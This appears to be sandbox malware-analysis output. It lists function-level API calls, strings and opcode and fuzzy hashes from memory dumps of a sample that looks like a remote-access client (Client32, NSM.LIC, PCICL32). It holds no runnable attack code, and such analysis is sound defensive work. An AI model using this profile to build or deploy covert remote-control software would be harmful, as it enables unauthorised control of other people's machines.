                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                                              • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                                              • API String ID: 1108920153-1959555903
                                                                                                              • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                                              • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                                              • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                                              • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                                              APIs
                                                                                                              • wsprintfA.USER32 ref: 11031926
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                              • String ID: %s%s.bin$927537$clientinv.cpp$m_pDoInv == NULL
                                                                                                              • API String ID: 4180936305-3740708941
                                                                                                              • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                                              • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                                              • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                                              • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                                              APIs
                                                                                                              • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                                              • __strdup.LIBCMT ref: 111446A7
                                                                                                                • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                                              • _free.LIBCMT ref: 111446DC
                                                                                                                • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                              • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                              • String ID:
                                                                                                              • API String ID: 398584587-0
                                                                                                              • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                                              • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                                              • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                                              • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                                              APIs
                                                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                                                • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                                              • _free.LIBCMT ref: 1100EDB4
                                                                                                                • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                              • _free.LIBCMT ref: 1100EDC7
                                                                                                              • _free.LIBCMT ref: 1100EDDA
                                                                                                              • _free.LIBCMT ref: 1100EDED
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                              • String ID:
                                                                                                              • API String ID: 3515823920-0
                                                                                                              • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                                              • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                                              • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                                              • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                                              APIs
                                                                                                                • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                              • wsprintfA.USER32 ref: 1114593E
                                                                                                              • wsprintfA.USER32 ref: 11145954
                                                                                                                • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                                                • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                                • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                              • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                              • API String ID: 3779116287-2600120591
                                                                                                              • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                                              • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                                              • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                                              • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile$CloseHandle
                                                                                                              • String ID: "
                                                                                                              • API String ID: 1443461169-123907689
                                                                                                              • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                                              • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                                              • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                                              • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                                              APIs
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,E43C2CA5,74DF2EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                                              • String ID: Client$DisableGeolocation
                                                                                                              • API String ID: 3315423714-4166767992
                                                                                                              • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                                              • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                                              • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                                              • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                                              APIs
                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                                                • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                                                • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                                                • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                                                • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                                              • TranslateMessage.USER32(?), ref: 110271F0
                                                                                                              • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                              • String ID: Exit Msgloop, quit=%d
                                                                                                              • API String ID: 3212272093-2210386016
                                                                                                              • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                                              • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                                              • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                                              • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 110173FD
                                                                                                                • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(000002E8,000000FF), ref: 1101733C
                                                                                                                • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                                                • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                                                • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                                                • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(000002E8,000000FF), ref: 11017252
                                                                                                                • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                                                • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                                                • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                                              • SetEvent.KERNEL32(000002E8), ref: 1101741D
                                                                                                              • GetTickCount.KERNEL32 ref: 11017423
                                                                                                              Strings
                                                                                                              • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                              • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                              • API String ID: 3804766296-4122679463
                                                                                                              • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                                              • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                                              • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                                              • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C795014
                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C798E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C795034
                                                                                                              • SetLastError.KERNEL32(00000078,00000000,?,6C798E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C79503D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
